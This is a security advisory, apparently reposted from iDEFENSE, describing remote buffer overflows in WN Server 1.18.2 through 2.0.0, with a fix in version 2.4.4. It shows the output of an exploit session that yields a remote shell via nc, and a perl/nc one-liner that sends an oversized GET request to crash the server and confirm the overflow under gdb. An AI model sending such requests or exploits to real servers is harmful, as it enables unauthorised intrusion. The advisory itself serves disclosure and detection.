COMMAND

	WN Server remote buffer overflows

SYSTEMS AFFECTED

	John Franks’ WN Server versions 1.18.2 through 2.0.0

PROBLEM

	In David Endler of iDEFENSE [http://www.idefense.com] security  advisory
	[09.30.2002] :
	

	 This issue was exlcusively disclosed to iDEFENSE by badc0ded

	 http://www.idefense.com/contributor.html

	

	Exploitation is possible by issuing WN Server a  long  GET  request.  In
	order to successfully exploit this vulnerability, customized shell  code
	is required to bypass the character filtering that WN Server imposes  on
	the requested URI.
	

	"WN is a Web server which runs on a wide variety of UNIX  platforms  and
	is freely available at no cost for any use under the terms  of  the  GNU
	General Public License." It is included  in  the  latest  FreeBSD  ports
	collection as well.
	

	The Mitre Corp.'s Common Vulnerabilities  and  Exposures  (CVE)  Project
	has assigned the identification number CAN-2002-1166 to this issue.
	

	 ANALYSIS

	

	The following is a snapshot of an exploit at work:
	

	$ (./wn_bof 0 3; cat) | nc target 80

	Trying ret=0xbfbeb4ec

	$ id

	uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

	$ uname

	FreeBSD

	

	Exploitation of a buffer overflow usually results in one of two  things:
	the targeted host process/application/host crashes,  or  arbitrary  code
	executes. Both have  serious  repercussions,  but  in  most  cases  code
	execution is more threatening in that it could  allow  for  the  further
	usurpation of higher-level privileges on the targeted host.
	

	DETECTION
	

	wn-1.18.2 - wn-2.0.0, which is included in the current  version  of  the
	FreeBSD Project’s FreeBSD ports  collection,  is  vulnerable.  Take  the
	following steps to determine whether a  specific  WN  implementation  is
	susceptible:
	

	1. Ensure that WN is running and open two terminals. 

	2. In the first terminal execute:

	    $ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80 

	3. In the second terminal, determine the process ID of the child that 

	   was spawned to handle the previous command, and attach GDB to it:

	    # ps ax | grep swn

	      4223 ?? Ss 0:00.29 ./swn

	      4711 ?? S 0:00.01 ./swn

	    # gdb ./swn 4711

	      GNU gdb 4.18

	      Copyright 1998 Free Software Foundation, Inc.

	      ... 

	4. In the second terminal, type 'c' telling GDB to continue. 

	5. In the first terminal, press enter. If at this point the following

	output is returned from GDB, then a vulnerable WN implementation is

	running:

	    Program received signal SIGSEGV, Segmentation fault.  0x61616161 in ?? () 

	

SOLUTION

	WN Server 2.4.4 is available at
	

	http://hopf.math.nwu.edu/wn-2.4.4.tar.gz